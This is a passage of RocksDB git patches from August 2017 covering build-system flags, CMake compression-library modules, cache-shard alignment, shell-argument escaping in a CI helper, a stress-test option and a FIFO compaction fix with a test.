rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -283,6 +287,7 @@ cpp_library( ], deps = [":rocksdb_lib"], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -296,6 +301,7 @@ cpp_library( ], deps = [":rocksdb_lib"], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -306,6 +312,7 @@ cpp_library( srcs = ["env/env_basic_test.cc"], deps = [":rocksdb_test_lib"], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -501,6 +508,7 @@ for test_cfg in ROCKS_TESTS: srcs = [test_cc], deps = [":rocksdb_test_lib"], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) diff --git a/buckifier/targets_cfg.py b/buckifier/targets_cfg.py index edc0e84556c..33023a589f4 100644 --- a/buckifier/targets_cfg.py +++ b/buckifier/targets_cfg.py @@ -6,7 +6,7 @@ import os TARGETS_PATH = os.path.dirname(__file__) -REPO_PATH = TARGETS_PATH[(TARGETS_PATH.find('fbcode/') + len('fbcode/')):] + "/" +REPO_PATH = "rocksdb/src/" BUCK_BINS = "buck-out/gen/" + REPO_PATH TEST_RUNNER = REPO_PATH + "buckifier/rocks_test_runner.sh" rocksdb_compiler_flags = [ @@ -18,9 +18,7 @@ "-DROCKSDB_RANGESYNC_PRESENT", "-DROCKSDB_SCHED_GETCPU_PRESENT", "-DROCKSDB_SUPPORT_THREAD_LOCAL", - "-DHAVE_SSE42", "-DOS_LINUX", - "-DROCKSDB_UBSAN_RUN", # Flags to enable libs we include "-DSNAPPY", "-DZLIB", @@ -51,6 +49,10 @@ "-I" + REPO_PATH + "include/", "-I" + REPO_PATH, ] + +rocksdb_arch_preprocessor_flags = { + "x86_64": ["-DHAVE_SSE42"], +} """ @@ -61,6 +63,7 @@ srcs = [%s], deps = [%s], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -72,6 +75,7 @@ srcs = [%s], deps = [%s], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -94,6 +98,7 @@ srcs = [test_cc], deps = [":rocksdb_test_lib"], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) From 185ade4c0c91288ae268f6ceca8310421325cea4 Mon Sep 17 00:00:00 2001 From: Jay Date: Sun, 13 Aug 2017 21:29:53 -0700 Subject: [PATCH 108/205] cmake: support more compression type Summary: This pr enables linking all the supported compression libraries via cmake. Closes https://github.com/facebook/rocksdb/pull/2552 Differential Revision: D5620607 Pulled By: yiwu-arbug fbshipit-source-id: b6949181f305bfdf04a98f898c92fd0caba0c45a --- CMakeLists.txt | 33 +++++++++++++++++++++++++++++++++ cmake/modules/Findbzip2.cmake | 21 +++++++++++++++++++++ cmake/modules/Findlz4.cmake | 21 +++++++++++++++++++++ cmake/modules/Findzlib.cmake | 21 +++++++++++++++++++++ cmake/modules/Findzstd.cmake | 21 +++++++++++++++++++++ 5 files changed, 117 insertions(+) create mode 100644 cmake/modules/Findbzip2.cmake create mode 100644 cmake/modules/Findlz4.cmake create mode 100644 cmake/modules/Findzlib.cmake create mode 100644 cmake/modules/Findzstd.cmake diff --git a/CMakeLists.txt b/CMakeLists.txt index b4b568b74be..36c9ff20e82 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -56,6 +56,7 @@ else() include_directories(${JEMALLOC_INCLUDE_DIR}) endif() endif() + option(WITH_SNAPPY "build with SNAPPY" OFF) if(WITH_SNAPPY) find_package(snappy REQUIRED) @@ -63,6 +64,38 @@ else() include_directories(${SNAPPY_INCLUDE_DIR}) list(APPEND THIRDPARTY_LIBS ${SNAPPY_LIBRARIES}) endif() + + option(WITH_ZLIB "build with zlib" OFF) + if(WITH_ZLIB) + find_package(zlib REQUIRED) + add_definitions(-DZLIB) + include_directories(${ZLIB_INCLUDE_DIR}) + list(APPEND THIRDPARTY_LIBS ${ZLIB_LIBRARIES}) + endif() + + option(WITH_BZ2 "build with bzip2" OFF) + if(WITH_BZ2) + find_package(bzip2 REQUIRED) + add_definitions(-DBZIP2) + include_directories(${BZIP2_INCLUDE_DIR}) + list(APPEND THIRDPARTY_LIBS ${BZIP2_LIBRARIES}) + endif() + + option(WITH_LZ4 "build with lz4" OFF) + if(WITH_LZ4) + find_package(lz4 REQUIRED) + add_definitions(-DLZ4) + include_directories(${LZ4_INCLUDE_DIR}) + list(APPEND THIRDPARTY_LIBS ${LZ4_LIBRARIES}) + endif() + + option(WITH_ZSTD "build with zstd" OFF) + if(WITH_ZSTD) + find_package(zstd REQUIRED) + add_definitions(-DZSTD) + include_directories(${ZSTD_INCLUDE_DIR}) + list(APPEND THIRDPARTY_LIBS ${ZSTD_LIBRARIES}) + endif() endif() if(WIN32) diff --git a/cmake/modules/Findbzip2.cmake b/cmake/modules/Findbzip2.cmake new file mode 100644 index 00000000000..87abbe941e0 --- /dev/null +++ b/cmake/modules/Findbzip2.cmake @@ -0,0 +1,21 @@ +# - Find Bzip2 +# Find the bzip2 compression library and includes +# +# BZIP2_INCLUDE_DIR - where to find bzlib.h, etc. +# BZIP2_LIBRARIES - List of libraries when using bzip2. +# BZIP2_FOUND - True if bzip2 found. + +find_path(BZIP2_INCLUDE_DIR + NAMES bzlib.h + HINTS ${BZIP2_ROOT_DIR}/include) + +find_library(BZIP2_LIBRARIES + NAMES bz2 + HINTS ${BZIP2_ROOT_DIR}/lib) + +include(FindPackageHandleStandardArgs) +find_package_handle_standard_args(bzip2 DEFAULT_MSG BZIP2_LIBRARIES BZIP2_INCLUDE_DIR) + +mark_as_advanced( + BZIP2_LIBRARIES + BZIP2_INCLUDE_DIR) diff --git a/cmake/modules/Findlz4.cmake b/cmake/modules/Findlz4.cmake new file mode 100644 index 00000000000..c34acef5e39 --- /dev/null +++ b/cmake/modules/Findlz4.cmake @@ -0,0 +1,21 @@ +# - Find Lz4 +# Find the lz4 compression library and includes +# +# LZ4_INCLUDE_DIR - where to find lz4.h, etc. +# LZ4_LIBRARIES - List of libraries when using lz4. +# LZ4_FOUND - True if lz4 found. + +find_path(LZ4_INCLUDE_DIR + NAMES lz4.h + HINTS ${LZ4_ROOT_DIR}/include) + +find_library(LZ4_LIBRARIES + NAMES lz4 + HINTS ${LZ4_ROOT_DIR}/lib) + +include(FindPackageHandleStandardArgs) +find_package_handle_standard_args(lz4 DEFAULT_MSG LZ4_LIBRARIES LZ4_INCLUDE_DIR) + +mark_as_advanced( + LZ4_LIBRARIES + LZ4_INCLUDE_DIR) diff --git a/cmake/modules/Findzlib.cmake b/cmake/modules/Findzlib.cmake new file mode 100644 index 00000000000..fb5aee9b5aa --- /dev/null +++ b/cmake/modules/Findzlib.cmake @@ -0,0 +1,21 @@ +# - Find zlib +# Find the zlib compression library and includes +# +# ZLIB_INCLUDE_DIR - where to find zlib.h, etc. +# ZLIB_LIBRARIES - List of libraries when using zlib. +# ZLIB_FOUND - True if zlib found. + +find_path(ZLIB_INCLUDE_DIR + NAMES zlib.h + HINTS ${ZLIB_ROOT_DIR}/include) + +find_library(ZLIB_LIBRARIES + NAMES z + HINTS ${ZLIB_ROOT_DIR}/lib) + +include(FindPackageHandleStandardArgs) +find_package_handle_standard_args(zlib DEFAULT_MSG ZLIB_LIBRARIES ZLIB_INCLUDE_DIR) + +mark_as_advanced( + ZLIB_LIBRARIES + ZLIB_INCLUDE_DIR) diff --git a/cmake/modules/Findzstd.cmake b/cmake/modules/Findzstd.cmake new file mode 100644 index 00000000000..a2964aa9f80 --- /dev/null +++ b/cmake/modules/Findzstd.cmake @@ -0,0 +1,21 @@ +# - Find zstd +# Find the zstd compression library and includes +# +# ZSTD_INCLUDE_DIR - where to find zstd.h, etc. +# ZSTD_LIBRARIES - List of libraries when using zstd. +# ZSTD_FOUND - True if zstd found. + +find_path(ZSTD_INCLUDE_DIR + NAMES zstd.h + HINTS ${ZSTD_ROOT_DIR}/include) + +find_library(ZSTD_LIBRARIES + NAMES zstd + HINTS ${ZSTD_ROOT_DIR}/lib) + +include(FindPackageHandleStandardArgs) +find_package_handle_standard_args(zstd DEFAULT_MSG ZSTD_LIBRARIES ZSTD_INCLUDE_DIR) + +mark_as_advanced( + ZSTD_LIBRARIES + ZSTD_INCLUDE_DIR) From c5f0c6cc660f1f4a8051db2aac3b8afc17818e70 Mon Sep 17 00:00:00 2001 From: Nikhil Benesch Date: Sun, 13 Aug 2017 21:30:15 -0700 Subject: [PATCH 109/205] compile with correct flags to determine SSE4.2 support Summary: With some compilers, `-std=c++11` is necessary for to be available. Pass this flag via $PLATFORM_CXXFLAGS. Fixes #2488. Closes https://github.com/facebook/rocksdb/pull/2545 Differential Revision: D5620610 Pulled By: yiwu-arbug fbshipit-source-id: 2f975b8c1ad52e283e677d9a33543abd064f13ce --- build_tools/build_detect_platform | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/build_tools/build_detect_platform b/build_tools/build_detect_platform index d040f21f517..c7ddb7cceec 100755 --- a/build_tools/build_detect_platform +++ b/build_tools/build_detect_platform @@ -458,7 +458,7 @@ elif test -z "$PORTABLE"; then fi fi -$CXX $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null </dev/null < #include int main() { From 279296f4d834d4cbdc35be28fca5b1eef71693a3 Mon Sep 17 00:00:00 2001 From: Nikhil Benesch Date: Sun, 13 Aug 2017 21:46:05 -0700 Subject: [PATCH 110/205] properly set C[XX]FLAGS during CMake configure-time checks Summary: Some compilers require `-std=c++11` for the `cstdint` header to be available. We already have logic to add `-std=c++11` to `CXXFLAGS` when the compiler is not MSVC; simply reorder CMakeLists.txt so that logic happens before the calls to `CHECK_CXX_SOURCE_COMPILES`. Additionally add a missing `set(CMAKE_REQUIRED_FLAGS, ...)` before a call to `CHECK_C_SOURCE_COMPILES`. Closes https://github.com/facebook/rocksdb/pull/2535 Differential Revision: D5384244 Pulled By: yiwu-arbug fbshipit-source-id: 2dbae4297c5d8ab4636e08b1457ffb2d3e37aef4 --- CMakeLists.txt | 51 +++++++++++++++++++++++++------------------------- 1 file changed, 26 insertions(+), 25 deletions(-) diff --git a/CMakeLists.txt b/CMakeLists.txt index 36c9ff20e82..0a28a7c43ae 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -148,6 +148,31 @@ if(WIN32 AND MSVC) endif() endif() +set(BUILD_VERSION_CC ${CMAKE_BINARY_DIR}/build_version.cc) +configure_file(util/build_version.cc.in ${BUILD_VERSION_CC} @ONLY) +add_library(build_version OBJECT ${BUILD_VERSION_CC}) +target_include_directories(build_version PRIVATE + ${CMAKE_CURRENT_SOURCE_DIR}/util) +if(MSVC) + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /Zi /nologo /EHsc /GS /Gd /GR /GF /fp:precise /Zc:wchar_t /Zc:forScope /errorReport:queue") + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /FC /d2Zi+ /W3 /wd4127 /wd4800 /wd4996 /wd4351") +else() + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -W -Wextra -Wall") + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wsign-compare -Wshadow -Wno-unused-parameter -Wno-unused-variable -Woverloaded-virtual -Wnon-virtual-dtor -Wno-missing-field-initializers") + if(MINGW) + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wno-format") + endif() + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++11") + if(NOT CMAKE_BUILD_TYPE STREQUAL "Debug") + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -O2 -fno-omit-frame-pointer") + include(CheckCXXCompilerFlag) + CHECK_CXX_COMPILER_FLAG("-momit-leaf-frame-pointer" HAVE_OMIT_LEAF_FRAME_POINTER) + if(HAVE_OMIT_LEAF_FRAME_POINTER) + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -momit-leaf-frame-pointer") + endif() + endif() +endif() + option(PORTABLE "build a portable binary" OFF) option(FORCE_SSE42 "force building with SSE4.2, even when PORTABLE=ON" OFF) if(PORTABLE) @@ -191,31 +216,6 @@ if(HAVE_THREAD_LOCAL) add_definitions(-DROCKSDB_SUPPORT_THREAD_LOCAL) endif() -set(BUILD_VERSION_CC ${CMAKE_BINARY_DIR}/build_version.cc) -configure_file(util/build_version.cc.in ${BUILD_VERSION_CC} @ONLY) -add_library(build_version OBJECT ${BUILD_VERSION_CC}) -target_include_directories(build_version PRIVATE - ${CMAKE_CURRENT_SOURCE_DIR}/util) -if(MSVC) - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /Zi /nologo /EHsc /GS /Gd /GR /GF /fp:precise /Zc:wchar_t /Zc:forScope /errorReport:queue") - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /FC /d2Zi+ /W3 /wd4127 /wd4800 /wd4996 /wd4351") -else() - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -W -Wextra -Wall") - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wsign-compare -Wshadow -Wno-unused-parameter -Wno-unused-variable -Woverloaded-virtual -Wnon-virtual-dtor -Wno-missing-field-initializers") - if(MINGW) - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wno-format") - endif() - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++11") - if(NOT CMAKE_BUILD_TYPE STREQUAL "Debug") - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -O2 -fno-omit-frame-pointer") - include(CheckCXXCompilerFlag) - CHECK_CXX_COMPILER_FLAG("-momit-leaf-frame-pointer" HAVE_OMIT_LEAF_FRAME_POINTER) - if(HAVE_OMIT_LEAF_FRAME_POINTER) - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -momit-leaf-frame-pointer") - endif() - endif() -endif() - option(FAIL_ON_WARNINGS "Treat compile warnings as errors" ON) if(FAIL_ON_WARNINGS) if(MSVC) @@ -325,6 +325,7 @@ endif() option(WITH_FALLOCATE "build with fallocate" ON) if(WITH_FALLOCATE) + set(CMAKE_REQUIRED_FLAGS ${CMAKE_C_FLAGS}) include(CheckCSourceCompiles) CHECK_C_SOURCE_COMPILES(" #include From ad42d2fcbbdd18640266ba3d76944a109d8f783b Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Wed, 9 Aug 2017 18:00:53 -0700 Subject: [PATCH 111/205] Remove residual arcanist_util directory --- arcanist_util/INTERNAL_ONLY_DIR | 2 -- 1 file changed, 2 deletions(-) delete mode 100644 arcanist_util/INTERNAL_ONLY_DIR diff --git a/arcanist_util/INTERNAL_ONLY_DIR b/arcanist_util/INTERNAL_ONLY_DIR deleted file mode 100644 index e55aa3bdfe3..00000000000 --- a/arcanist_util/INTERNAL_ONLY_DIR +++ /dev/null @@ -1,2 +0,0 @@ -arcanist_util are only used internaly, If you want to change it please check -/arcanist_util From e367774d19501a78c0699e6458d420c57ac73567 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Mon, 14 Aug 2017 14:28:33 -0700 Subject: [PATCH 112/205] Overload new[] to properly align LRUCacheShard Summary: Also verify it fixes gcc7 compile failure #2672 (see also #2699) Closes https://github.com/facebook/rocksdb/pull/2732 Differential Revision: D5620348 Pulled By: yiwu-arbug fbshipit-source-id: 87db657ab734f23b1bfaaa9db9b9956d10eaef59 --- Makefile | 13 ------------- cache/lru_cache.cc | 12 ++++++++++-- cache/lru_cache.h | 4 ++++ 3 files changed, 14 insertions(+), 15 deletions(-) diff --git a/Makefile b/Makefile index 9b80864fcd8..a657fad72b5 100644 --- a/Makefile +++ b/Makefile @@ -259,19 +259,6 @@ default: all WARNING_FLAGS = -W -Wextra -Wall -Wsign-compare -Wshadow \ -Wno-unused-parameter -CCVERSION = $(shell $(CXX) -dumpversion) -CCNAME = $(shell $(CXX) --version | awk 'NR==1' | cut -f1 -d " ") - -ifeq ($(CCNAME), clang) -ifeq ($(CCVERSION), 4*) - CXXFLAGS += -faligned-new -endif -else -ifeq ($(CCVERSION), 7) - CXXFLAGS += -faligned-new -endif -endif - ifndef DISABLE_WARNING_AS_ERROR WARNING_FLAGS += -Werror endif diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index f833374e73c..a78a52dffff 100644 --- a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -234,11 +234,19 @@ void LRUCacheShard::EvictFromLRU(size_t charge, } void* LRUCacheShard::operator new(size_t size) { - return rocksdb::port::cacheline_aligned_alloc(size); + return port::cacheline_aligned_alloc(size); +} + +void* LRUCacheShard::operator new[](size_t size) { + return port::cacheline_aligned_alloc(size); } void LRUCacheShard::operator delete(void *memblock) { - rocksdb::port::cacheline_aligned_free(memblock); + port::cacheline_aligned_free(memblock); +} + +void LRUCacheShard::operator delete[](void* memblock) { + port::cacheline_aligned_free(memblock); } void LRUCacheShard::SetCapacity(size_t capacity) { diff --git a/cache/lru_cache.h b/cache/lru_cache.h index 2fd44bbce50..abe78fd0c78 100644 --- a/cache/lru_cache.h +++ b/cache/lru_cache.h @@ -205,8 +205,12 @@ class ALIGN_AS(CACHE_LINE_SIZE) LRUCacheShard : public CacheShard { // Overloading to aligned it to cache line size void* operator new(size_t); + void* operator new[](size_t); + void operator delete(void *); + void operator delete[](void*); + private: void LRU_Remove(LRUHandle* e); void LRU_Insert(LRUHandle* e); From dfa6c23c4b6589479df998701368336f07e8912c Mon Sep 17 00:00:00 2001 From: Neal Poole Date: Tue, 15 Aug 2017 06:52:50 -0700 Subject: [PATCH 113/205] Update RocksDBCommonHelper to use escapeshellarg Summary: Most of the data used here in shell commands is not generated directly from user input but some data (ie: from environment variables) may have been external influenced. It is a good practice to escape this data before using it in a shell command. Originally D4800264 but we never quite got it merged. Reviewed By: yiwu-arbug Differential Revision: D5595052 fbshipit-source-id: c09d8b47fe35fc6a47afb4933ccad9d56ca8d7be --- build_tools/RocksDBCommonHelper.php | 50 ++++++++++++++++++----------- 1 file changed, 31 insertions(+), 19 deletions(-) diff --git a/build_tools/RocksDBCommonHelper.php b/build_tools/RocksDBCommonHelper.php index 41d1e21738f..9fe770fe956 100644 --- a/build_tools/RocksDBCommonHelper.php +++ b/build_tools/RocksDBCommonHelper.php @@ -21,11 +21,17 @@ function postURL($diffID, $url) { assert(is_numeric($diffID)); assert(strlen($url) > 0); - $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' - . '"name":"click here for sandcastle tests for D' . $diffID . '", ' - . '"link":"' . $url . '"}\' | ' - . 'arc call-conduit ' - . 'differential.updateunitresults'; + $cmd_args = array( + 'diff_id' => (int)$diffID, + 'name' => sprintf( + 'click here for sandcastle tests for D%d', + (int)$diffID + ), + 'link' => $url + ); + $cmd = 'echo ' . escapeshellarg(json_encode($cmd_args)) + . ' | arc call-conduit differential.updateunitresults'; + shell_exec($cmd); } @@ -35,11 +41,15 @@ function buildUpdateTestStatusCmd($diffID, $test, $status) { assert(strlen($test) > 0); assert(strlen($status) > 0); - $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' - . '"name":"' . $test . '", ' - . '"result":"' . $status . '"}\' | ' - . 'arc call-conduit ' - . 'differential.updateunitresults'; + $cmd_args = array( + 'diff_id' => (int)$diffID, + 'name' => $test, + 'result' => $status + ); + + $cmd = 'echo ' . escapeshellarg(json_encode($cmd_args)) + . ' | arc call-conduit differential.updateunitresults'; + return $cmd; } @@ -68,7 +78,7 @@ function getSteps($applyDiff, $diffID, $username, $test) { // and authenticate using that in Sandcastle. $setup = array( "name" => "Setup arcrc", - "shell" => "echo " . $arcrc_content . " | base64 --decode" + "shell" => "echo " . escapeshellarg($arcrc_content) . " | base64 --decode" . " | gzip -d > ~/.arcrc", "user" => "root" ); @@ -114,7 +124,7 @@ function getSteps($applyDiff, $diffID, $username, $test) { $patch = array( "name" => "Patch " . $diffID, "shell" => "arc --arcrc-file ~/.arcrc " - . "patch --nocommit --diff " . $diffID, + . "patch --nocommit --diff " . escapeshellarg($diffID), "user" => "root" ); @@ -125,8 +135,8 @@ function getSteps($applyDiff, $diffID, $username, $test) { } // Run the actual command. - $cmd = $cmd . "J=$(nproc) ./build_tools/precommit_checker.py " . $test - . "; exit_code=$?; "; + $cmd = $cmd . "J=$(nproc) ./build_tools/precommit_checker.py " . + escapeshellarg($test) . "; exit_code=$?; "; if ($applyDiff) { $cmd = $cmd . "([[ \$exit_code -eq 0 ]] &&" @@ -159,7 +169,7 @@ function getSteps($applyDiff, $diffID, $username, $test) { "name" => "Run " . $test, "shell" => $cmd, "user" => "root", - "parser" => "python build_tools/error_filter.py " . $test, + "parser" => "python build_tools/error_filter.py " . escapeshellarg($test), ); $steps[] = $run_test; @@ -207,7 +217,7 @@ function getSandcastleConfig() { if (file_exists(PRIMARY_TOKEN_FILE)) { $cmd = 'cat ' . PRIMARY_TOKEN_FILE; } else { - $cmd = 'cat ' . $cwd_token_file; + $cmd = 'cat ' . escapeshellarg($cwd_token_file); } assert(strlen($cmd) > 0); @@ -331,9 +341,11 @@ function startTestsInSandcastle($applyDiff, $workflow, $diffID) { $app = $sandcastle_config[0]; $token = $sandcastle_config[1]; - $cmd = 'curl -s -k -F app=' . $app . ' ' - . '-F token=' . $token . ' -F job=\'' . json_encode($job) - .'\' "' . $url . '"'; + $cmd = 'curl -s -k ' + . ' -F app=' . escapeshellarg($app) + . ' -F token=' . escapeshellarg($token) + . ' -F job=' . escapeshellarg(json_encode($job)) + .' ' . escapeshellarg($url); $output = shell_exec($cmd); assert(strlen($output) > 0); From 7aa96db7a20b0ca6e58f92e9b308324f25808aff Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Tue, 15 Aug 2017 11:53:00 -0700 Subject: [PATCH 114/205] db_stress rolling active window Summary: Support a window of `active_width` keys that rolls through `[0, max_key)` over the duration of the test. Operations only affect keys inside the window. This gives us the ability to detect L0->L0 deletion bug (#2722). Closes https://github.com/facebook/rocksdb/pull/2739 Differential Revision: D5628555 Pulled By: ajkr fbshipit-source-id: 9cb2d8f4ab1a7c73f7797b8e19f7094970ea8749 --- tools/db_stress.cc | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/tools/db_stress.cc b/tools/db_stress.cc index db905f0c887..c7153f2e943 100644 --- a/tools/db_stress.cc +++ b/tools/db_stress.cc @@ -93,6 +93,13 @@ DEFINE_int64(max_key, 1 * KB* KB, DEFINE_int32(column_families, 10, "Number of column families"); +DEFINE_int64( + active_width, 0, + "Number of keys in active span of the key-range at any given time. The " + "span begins with its left endpoint at key 0, gradually moves rightwards, " + "and ends with its right endpoint at max_key. If set to 0, active_width " + "will be sanitized to be equal to max_key."); + // TODO(noetzli) Add support for single deletes DEFINE_bool(test_batches_snapshots, false, "If set, the test uses MultiGet(), MultiPut() and MultiDelete()" @@ -1727,7 +1734,11 @@ class StressTest { } #endif // !ROCKSDB_LITE - long rand_key = thread->rand.Next() % max_key; + const double completed_ratio = + static_cast(i) / FLAGS_ops_per_thread; + const int64_t base_key = static_cast( + completed_ratio * (FLAGS_max_key - FLAGS_active_width)); + long rand_key = base_key + thread->rand.Next() % FLAGS_active_width; int rand_column_family = thread->rand.Next() % FLAGS_column_families; std::string keystr = Key(rand_key); Slice key = keystr; @@ -2433,6 +2444,12 @@ int main(int argc, char** argv) { "test_batches_snapshots mode\n"); exit(1); } + if (FLAGS_active_width > FLAGS_max_key) { + fprintf(stderr, "Error: active_width can be at most max_key\n"); + exit(1); + } else if (FLAGS_active_width == 0) { + FLAGS_active_width = FLAGS_max_key; + } // Choose a location for the test database if none given with --db= if (FLAGS_db.empty()) { From 3204a4f64bc718a3138d867e8083a2f71d01ec63 Mon Sep 17 00:00:00 2001 From: lxcode Date: Tue, 15 Aug 2017 12:17:13 -0700 Subject: [PATCH 115/205] Fix missing stdlib include required for abort() Summary: If ROCKSDB_LITE is defined, a call to abort() is introduced. This call requires stdlib.h. Build log of unpatched 5.7.1: http://beefy9.nyi.freebsd.org/data/110amd64-default/447974/logs/rocksdb-lite-5.7.1.log Closes https://github.com/facebook/rocksdb/pull/2744 Reviewed By: yiwu-arbug Differential Revision: D5632372 Pulled By: lxcode fbshipit-source-id: b2a8e692bf14ccf1f875f3a00463e87bba310a2b --- include/rocksdb/filter_policy.h | 1 + 1 file changed, 1 insertion(+) diff --git a/include/rocksdb/filter_policy.h b/include/rocksdb/filter_policy.h index 8c813d93e65..8add48e4963 100644 --- a/include/rocksdb/filter_policy.h +++ b/include/rocksdb/filter_policy.h @@ -22,6 +22,7 @@ #include #include +#include #include #include From 71598cdc7518336b88c49ad8b1843f1c0b618d4e Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Tue, 15 Aug 2017 12:51:41 -0700 Subject: [PATCH 116/205] Fix false removal of tombstone issue in FIFO and kCompactionStyleNone Summary: Similar to the bug fixed by https://github.com/facebook/rocksdb/pull/2726, FIFO with compaction and kCompactionStyleNone during user customized CompactFiles() with output level to be 0 can suffer from the same problem. Fix it by leveraging the bottommost_level_ flag. Closes https://github.com/facebook/rocksdb/pull/2735 Differential Revision: D5626906 Pulled By: siying fbshipit-source-id: 2b148d0461c61dbd986d74655e384419ae442158 --- db/compaction.cc | 44 ++++++++++++++++++++++---------------------- db/db_test.cc | 40 ++++++++++++++++++++++++++++++++++++++++ 2 files changed, 62 insertions(+), 22 deletions(-) diff --git a/db/compaction.cc b/db/compaction.cc index 9ea332da3fd..706eb3be031 100644 --- a/db/compaction.cc +++ b/db/compaction.cc @@ -284,32 +284,32 @@ bool Compaction::KeyNotExistsBeyondOutputLevel( assert(input_version_ != nullptr); assert(level_ptrs != nullptr); assert(level_ptrs->size() == static_cast(number_levels_)); - assert(cfd_->ioptions()->compaction_style != kCompactionStyleFIFO); - if (cfd_->ioptions()->compaction_style == kCompactionStyleUniversal) { - return bottommost_level_; - } - if (cfd_->ioptions()->compaction_style == kCompactionStyleLevel && - output_level_ == 0) { - return false; - } - // Maybe use binary search to find right entry instead of linear search? - const Comparator* user_cmp = cfd_->user_comparator(); - for (int lvl = output_level_ + 1; lvl < number_levels_; lvl++) { - const std::vector& files = input_vstorage_->LevelFiles(lvl); - for (; level_ptrs->at(lvl) < files.size(); level_ptrs->at(lvl)++) { - auto* f = files[level_ptrs->at(lvl)]; - if (user_cmp->Compare(user_key, f->largest.user_key()) <= 0) { - // We've advanced far enough - if (user_cmp->Compare(user_key, f->smallest.user_key()) >= 0) { - // Key falls in this file's range, so definitely - // exists beyond output level - return false; + if (cfd_->ioptions()->compaction_style == kCompactionStyleLevel) { + if (output_level_ == 0) { + return false; + } + // Maybe use binary search to find right entry instead of linear search? + const Comparator* user_cmp = cfd_->user_comparator(); + for (int lvl = output_level_ + 1; lvl < number_levels_; lvl++) { + const std::vector& files = + input_vstorage_->LevelFiles(lvl); + for (; level_ptrs->at(lvl) < files.size(); level_ptrs->at(lvl)++) { + auto* f = files[level_ptrs->at(lvl)]; + if (user_cmp->Compare(user_key, f->largest.user_key()) <= 0) { + // We've advanced far enough + if (user_cmp->Compare(user_key, f->smallest.user_key()) >= 0) { + // Key falls in this file's range, so definitely + // exists beyond output level + return false; + } + break; } - break; } } + return true; + } else { + return bottommost_level_; } - return true; } // Mark (or clear) each file that is being compacted diff --git a/db/db_test.cc b/db/db_test.cc index 675c403e5cc..fddb7aea6d0 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -2811,6 +2811,46 @@ TEST_F(DBTest, FIFOCompactionTestWithCompaction) { options.compaction_options_fifo.max_table_files_size); } +TEST_F(DBTest, FIFOCompactionStyleWithCompactionAndDelete) { + Options options; + options.compaction_style = kCompactionStyleFIFO; + options.write_buffer_size = 20 << 10; // 20K + options.arena_block_size = 4096; + options.compaction_options_fifo.max_table_files_size = 1500 << 10; // 1MB + options.compaction_options_fifo.allow_compaction = true; + options.level0_file_num_compaction_trigger = 3; + options.compression = kNoCompression; + options.create_if_missing = true; + options = CurrentOptions(options); + DestroyAndReopen(options); + + Random rnd(301); + for (int i = 0; i < 3; i++) { + // Each file contains a different key which will be dropped later. + ASSERT_OK(Put("a" + ToString(i), RandomString(&rnd, 500))); + ASSERT_OK(Put("key" + ToString(i), "")); + ASSERT_OK(Put("z" + ToString(i), RandomString(&rnd, 500))); + Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); + } + ASSERT_EQ(NumTableFilesAtLevel(0), 1); + for (int i = 0; i < 3; i++) { + ASSERT_EQ("", Get("key" + ToString(i))); + } + for (int i = 0; i < 3; i++) { + // Each file contains a different key which will be dropped later. + ASSERT_OK(Put("a" + ToString(i), RandomString(&rnd, 500))); + ASSERT_OK(Delete("key" + ToString(i))); + ASSERT_OK(Put("z" + ToString(i), RandomString(&rnd, 500))); + 